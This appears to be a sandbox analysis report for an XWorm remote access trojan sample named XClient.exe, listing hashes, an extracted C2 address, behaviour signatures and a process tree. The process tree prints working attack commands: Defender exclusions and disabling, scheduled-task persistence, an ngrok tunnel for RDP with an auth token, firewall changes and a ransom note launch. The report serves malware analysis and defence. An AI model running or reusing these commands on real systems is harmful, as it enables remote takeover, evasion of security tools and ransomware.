Overview

overview

10

Static

static

10

XClient.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    1790s
  • max time network
    1782s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240214-en
  • resource tags

    arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17/02/2024, 16:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XClient.exe

  • Size

    80KB

  • MD5

    ae2f652e52dc8b5798606b3b1dfdca26

  • SHA1

    814e6fddaa6f41708f3927261282dcd550bb36bc

  • SHA256

    29af9b630c90fb4fbf0ae8c1ab72bb517ad0eea22609fe6cf0e5750cdf7cae31

  • SHA512

    826142b3ca1363002f975268764b126bbc50a83e49cafa1d1a36097f37764de1672b093a9d5d54466039ce84979a449eb91cdc25394eddb8138f38e745616ac5

  • SSDEEP

    1536:ZIRskJ7epm+t258i12bAX9Uz9Y6ITtOFGWPSvKOG:uxU5AhIbAdtOVqpG

Score
10/10
xwormevasionpersistenceransomwarerattrojan

Malware Config

Extracted

Family

xworm

C2

institute-u.gl.at.ply.gg:34038

Attributes
  • Install_directory

    %AppData%

  • install_file

    scvhost.exe

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 3 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Modifies Installed Components in the registry 2 TTPs 3 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
    persistence
  • Allows Network login with blank passwords 1 TTPs 1 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 7 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 4 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 29 IoCs
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Control Panel 3 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 17 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 31 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
        2⤵
        • Modifies Windows Defender Real-time Protection settings
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:132
        • C:\Windows\system32\sc.exe
          "C:\Windows\system32\sc.exe" qc windefend
          3⤵
          • Launches sc.exe
          PID:4672
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
          3⤵
            PID:4776
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1436
          • C:\Windows\system32\net1.exe
            "C:\Windows\system32\net1.exe" stop windefend
            3⤵
              PID:128
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
              3⤵
              • Launches sc.exe
              PID:2716
        • C:\Users\Admin\AppData\Local\Temp\XClient.exe
          "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Allows Network login with blank passwords
          • Drops startup file
          • Adds Run key to start application
          • Enumerates connected drives
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • Modifies Control Panel
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2308
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:880
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\scvhost.exe'
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'scvhost.exe'
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:112
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "scvhost" /tr "C:\Users\Admin\AppData\Roaming\scvhost.exe"
            2⤵
            • Creates scheduled task(s)
            PID:680
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /im ngrok.exe /f
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4776
          • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
            C:\Users\Admin\AppData\Local\Temp\ngrok.exe config add-authtoken 2cVE8ZRrLt5kKPrcuFLkioOoWCM_6wn7xfPKCLhGZYX2QFwr2
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1296
          • C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe
            "C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe" -i
            2⤵
            • Sets DLL path for service in the registry
            • Executes dropped EXE
            • Modifies WinLogon
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1632
            • C:\Windows\SYSTEM32\netsh.exe
              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              3⤵
              • Modifies Windows Firewall
              PID:1784
          • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
            "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3916
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\h3fjyphv\h3fjyphv.cmdline"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1632
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3E6D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc68BF2B8488E2488B8F26BEB3134C082.TMP"
              3⤵
                PID:1980
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\re0ipjtd\re0ipjtd.cmdline"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2544
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96CE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB4746E535D9E4807B01388645E986F48.TMP"
                3⤵
                  PID:3808
              • C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe
                "C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe" -i
                2⤵
                • Executes dropped EXE
                PID:1920
              • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
                "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
                2⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:4236
              • C:\Windows\system32\sc.exe
                "C:\Windows\system32\sc.exe" qc windefend
                2⤵
                • Launches sc.exe
                PID:4308
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                2⤵
                  PID:4668
                • C:\Windows\system32\whoami.exe
                  "C:\Windows\system32\whoami.exe" /groups
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3628
                • C:\Windows\system32\net1.exe
                  "C:\Windows\system32\net1.exe" start TrustedInstaller
                  2⤵
                    PID:3872
                  • C:\Windows\system32\net1.exe
                    "C:\Windows\system32\net1.exe" start lsass
                    2⤵
                      PID:4348
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kh1cm42u\kh1cm42u.cmdline"
                      2⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:3868
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dclgksdw\dclgksdw.cmdline"
                      2⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:3688
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4f0nku4m\4f0nku4m.cmdline"
                      2⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:1904
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y3mw54hd\y3mw54hd.cmdline"
                      2⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:1416
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\u0fecgv5\u0fecgv5.cmdline"
                      2⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:4964
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ttz33wwx\ttz33wwx.cmdline"
                      2⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:2780
                    • C:\Windows\explorer.exe
                      "C:\Windows\explorer.exe"
                      2⤵
                        PID:2660
                      • C:\Windows\SYSTEM32\taskkill.exe
                        taskkill /F /IM explorer.exe
                        2⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1300
                      • C:\Windows\explorer.exe
                        "C:\Windows\explorer.exe"
                        2⤵
                        • Modifies Installed Components in the registry
                        • Enumerates connected drives
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2356
                      • C:\Windows\SYSTEM32\taskkill.exe
                        taskkill /F /IM explorer.exe
                        2⤵
                        • Kills process with taskkill
                        PID:4872
                      • C:\Windows\explorer.exe
                        "C:\Windows\explorer.exe"
                        2⤵
                        • Modifies Installed Components in the registry
                        • Enumerates connected drives
                        • Checks SCSI registry key(s)
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of SetWindowsHookEx
                        PID:3792
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
                        2⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        PID:4192
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc53fb3cb8,0x7ffc53fb3cc8,0x7ffc53fb3cd8
                          3⤵
                            PID:1008
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
                            3⤵
                              PID:4728
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8
                              3⤵
                                PID:5096
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
                                3⤵
                                  PID:1176
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
                                  3⤵
                                    PID:2464
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
                                    3⤵
                                      PID:1944
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4464 /prefetch:8
                                      3⤵
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1828
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                                      3⤵
                                        PID:2268
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1988 /prefetch:1
                                        3⤵
                                          PID:2976
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:8
                                          3⤵
                                            PID:4144
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
                                            3⤵
                                              PID:1148
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
                                              3⤵
                                                PID:3520
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
                                                3⤵
                                                  PID:2396
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
                                                  3⤵
                                                    PID:1568
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1
                                                    3⤵
                                                      PID:2572
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17929249413830222987,9464234554802552353,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5240 /prefetch:2
                                                      3⤵
                                                        PID:2364
                                                    • C:\Windows\SYSTEM32\CMD.EXE
                                                      "CMD.EXE"
                                                      2⤵
                                                        PID:3348
                                                        • C:\Windows\system32\timeout.exe
                                                          timeout /t 12
                                                          3⤵
                                                          • Delays execution with timeout.exe
                                                          PID:3800
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters" /v CrashOnCtrlScroll /t REG_DWORD /d 0x1 /f
                                                          3⤵
                                                            PID:4296
                                                        • C:\Windows\System32\schtasks.exe
                                                          "C:\Windows\System32\schtasks.exe" /delete /f /tn "scvhost"
                                                          2⤵
                                                            PID:3668
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1E00.tmp.bat""
                                                            2⤵
                                                              PID:4532
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout 3
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:3104
                                                          • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                            C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3788
                                                          • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                            C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3764
                                                          • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                            C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5068
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                            1⤵
                                                              PID:4504
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                              1⤵
                                                              • Loads dropped DLL
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:488
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1832
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4452
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4144
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2456
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1544
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3332
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4052
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1976
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1436
                                                            • C:\Windows\system32\AUDIODG.EXE
                                                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004E0
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3736
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3856
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2600
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2856
                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                              1⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:3616
                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
